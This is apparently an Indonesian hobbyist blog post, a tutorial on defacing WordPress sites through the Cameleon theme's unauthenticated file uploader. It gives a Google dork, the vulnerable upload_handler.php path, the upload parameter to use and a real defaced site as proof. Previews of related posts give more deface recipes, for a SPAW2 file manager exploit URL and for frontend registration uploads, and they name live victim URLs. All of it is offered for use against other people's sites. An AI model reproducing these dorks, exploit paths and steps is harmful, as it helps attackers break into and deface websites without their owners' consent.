Langsung ke konten utama

Deface metode wp chameleon


Assalamualaikum wr wb
Kembali lagi dengan Sayah Randi;v
Oke jangan banyak bacot langsung aja ke tutor nya;v
•  Bahan bahan :
1. Android/PC
2. kuota/WiFi
3. Script Deface
4. Tools Crsf > Touch Me Senpai


> Dork :
inurl:/wp-content/themes/cameleon/
> Exploit :
- /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

•  Langkah- langkah :

Pertama kalian dorking google dulu pakek dork di atas.

Nahh kalo udah pilih salah satu web nya.
Nahh sekarang tinggal nentuin vuln apa kaga nya.Caranya? Masukin exploit di atas.

Ex : www.target.coli/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php

Kalo vuln kek gambar di bawah ini.
Nah klo udah begitu kita tinggal ke crsf nya



Kolom URL isi link web vuln tadi,POST File isi dengan qqfile kemudian klik Kunci.

Klik Pilih File kemudian pilih file lu abis itu klik Upload.Klo berhasil tandanya muncul kata Succes BLA BLA BLA:V

Tinggal kita panggil dah:v

• www.target.co.li/wp-content/uploads/tahun/bulan/namasc.html

Contohnya :
• http://www.silvertrading.pe/wp-content/uploads/2019/12/Apa-itu.html

Sekian dari saya bye bye;v

Komentar

Postingan populer dari blog ini

Cara Deface spaw upload

Deface Spaw Upload Vulnerability + Live Target Bahan-bahan : 1. HP/PC 2. Kuota (wajib) 3. Jembud (wajib) 4. Dork : ** inurl:"spaw2/upload/files/" 5. Script deface. ** ext : .txt / .html 6. Exploit : spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files Langkah-langkah : 1. Dorking lah njink kek biasa. 2. Jika udah nemu masukkan exploit nya, seperti dibawah. www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files atau www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files 3. Cari tulisan image, pencet, rubah jadi file. 4. Pilih file, upload. 5. Cari filenya, cari tulisan "download file" 6. Pencet tuh, a

Deface Frontend Register Upload + Live Target

Deface Frontend Register Upload + Live Target Bahan-bahan: • HP/PC • Kuota • Jembud (wajib) • Browser Kesayangan • Dork + inurl:/index.php/en/147/featured • Script deface + Ext: .txt (gabisa up .html) Langkah-langkah: - Dorking dulu lah sono, sampe nemu target. - Masuk ke salah satu web, lalu cari tempat Login/Registrasi (Cari tombolnya cuk) - Registrasi dulu, inget username sama Password nya. - Udah registrasi? Login lah. Terus klik "My Profile" - Scroll kebawah, add file. - Pencet lama kaca pembesar, buka di tab baru (PC klik kanan) Atau bisa juga gini. xnxx.go.id/files/tod.txt Done! Live Target + http://www.ozpropertysale.com.au/index.php/en/147/featured Hasil. + http://www.ozpropertysale.com.au/files/duar.txt # sumber dari misetong padahal dia juga liat ya , kan kontol